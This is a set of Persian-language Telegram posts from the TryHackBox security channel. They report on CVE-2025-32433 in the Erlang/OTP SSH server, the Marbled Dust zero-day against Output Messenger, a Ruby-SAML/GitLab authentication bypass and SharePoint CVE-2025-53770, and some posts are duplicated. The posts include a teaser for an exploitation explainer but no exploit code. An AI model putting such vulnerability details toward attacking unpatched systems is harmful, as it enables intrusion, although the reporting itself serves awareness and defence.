محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
Cisco
Cisco Security Advisory: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server
On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device.
The vulnerability is due to a flaw in…
The vulnerability is due to a flaw in…
👍1
Try Hack Box
برای توضیح نحوه بهرهبرداری از آسیبپذیری CVE-2025-32433 در Erlang/OTP و پیادهسازی حمله، باید ابتدا به جزئیات فنی آسیبپذیری و مکانیزم آن توجه کرد. این آسیبپذیری مربوط به پردازش نادرست پیامهای پروتکل SSH است که میتواند منجر به اجرای کد از راه دور (RCE)…
نتیجهگیری
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2
🪲 چگونه از آخرین CVE های موجود مطلع بمانیم؟
#CVE #tips
@TryHackBox
curl cvedb.shodan.io/cves | jq | grep "cve_id"
#CVE #tips
@TryHackBox
👍11
CVE-2025-27920:
آسیبپذیری روز صفر، نفوذ کامل.
گروه APT به نام Marbled Dust با سوءاستفاده از یک آسیبپذیری روز صفر در پیامرسان شرکتی، حملهای جاسوسی علیه کاربران Output Messenger انجام داد.
— اهداف انتخاب شده، سازههای مرتبط با ارتش کرد در عراق بودند.
این حمله و خود آسیبپذیری، با شناسه CVE-2025-27920 ، توسط تحلیلگران اطلاعات تهدید مایکروسافت کشف شد .
این مشکل، مدیر سرور پیامرسان خروجی (Output Messenger Server Manager) را تحت تأثیر قرار میدهد و یک آسیبپذیری پیمایش دایرکتوری (Directory Traversal) است که به مهاجمان احراز هویتشده اجازه میدهد تا به فایلهای خارج از دایرکتوری مجاز، از جمله پیکربندیها، دادههای کاربر و حتی کد منبع، دسترسی پیدا کنند.
#News #MarbledDust #Microsoft #ART #Vulnerability #CVE #Spy
@TryHackBox
آسیبپذیری روز صفر، نفوذ کامل.
گروه APT به نام Marbled Dust با سوءاستفاده از یک آسیبپذیری روز صفر در پیامرسان شرکتی، حملهای جاسوسی علیه کاربران Output Messenger انجام داد.
— اهداف انتخاب شده، سازههای مرتبط با ارتش کرد در عراق بودند.
این حمله و خود آسیبپذیری، با شناسه CVE-2025-27920 ، توسط تحلیلگران اطلاعات تهدید مایکروسافت کشف شد .
این مشکل، مدیر سرور پیامرسان خروجی (Output Messenger Server Manager) را تحت تأثیر قرار میدهد و یک آسیبپذیری پیمایش دایرکتوری (Directory Traversal) است که به مهاجمان احراز هویتشده اجازه میدهد تا به فایلهای خارج از دایرکتوری مجاز، از جمله پیکربندیها، دادههای کاربر و حتی کد منبع، دسترسی پیدا کنند.
#News #MarbledDust #Microsoft #ART #Vulnerability #CVE #Spy
@TryHackBox
👍3
🥷 دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)
چرا باید CVE های مختلف را مطالعه کنیم؟ حداقل برای گسترش افق دید شما در صنعت پیچیده ما و درک پیشنیازهای باگها. امروز، برای شما، یک آسیبپذیری حیاتی دیگر در GitLab را بررسی میکنیم که به شما امکان میدهد مکانیسمهای احراز هویت SAML را دور بزنید و با استفاده از یک نقص در پردازش پاسخ SAML، به دسترسی غیرمجاز دست یابید.
🔶️ بخوانید
#CVE #writeup
@TryHackBox
چرا باید CVE های مختلف را مطالعه کنیم؟ حداقل برای گسترش افق دید شما در صنعت پیچیده ما و درک پیشنیازهای باگها. امروز، برای شما، یک آسیبپذیری حیاتی دیگر در GitLab را بررسی میکنیم که به شما امکان میدهد مکانیسمهای احراز هویت SAML را دور بزنید و با استفاده از یک نقص در پردازش پاسخ SAML، به دسترسی غیرمجاز دست یابید.
🔶️ بخوانید
#CVE #writeup
@TryHackBox
❤3👍2
Forwarded from TryHackBox Story
🚨 حمله گسترده به آسیبپذیری خطرناک در Microsoft SharePoint (CVE-2025-53770)
🔓 یک آسیبپذیری روز صفر وصلهنشده در SharePoint توسط مهاجمان بهصورت گسترده مورد سوءاستفاده قرار گرفته است.
🏢 بیش از ۷۵ سازمان، از جمله شرکتها و نهادهای دولتی، تاکنون قربانی شدهاند.
⚠️ مهاجمان از این باگ برای دسترسی از راه دور و نفوذ عمیق به سرورهای آسیبپذیر استفاده میکنند.
🛑 اگر از SharePoint استفاده میکنید:
🔍 فوراً بررسی امنیتی انجام دهید
🔒 دسترسیها را محدود کنید
🚫 سرویسهای حیاتی را موقتاً ایزوله کنید
📎 جزئیات فنی و لیست حملات:
🔗 کامل خبر
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #ZeroDay #Microsoft #CVE #SharePoint
🔓 یک آسیبپذیری روز صفر وصلهنشده در SharePoint توسط مهاجمان بهصورت گسترده مورد سوءاستفاده قرار گرفته است.
🏢 بیش از ۷۵ سازمان، از جمله شرکتها و نهادهای دولتی، تاکنون قربانی شدهاند.
⚠️ مهاجمان از این باگ برای دسترسی از راه دور و نفوذ عمیق به سرورهای آسیبپذیر استفاده میکنند.
🛑 اگر از SharePoint استفاده میکنید:
🔍 فوراً بررسی امنیتی انجام دهید
🔒 دسترسیها را محدود کنید
🚫 سرویسهای حیاتی را موقتاً ایزوله کنید
📎 جزئیات فنی و لیست حملات:
🔗 کامل خبر
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #ZeroDay #Microsoft #CVE #SharePoint
❤1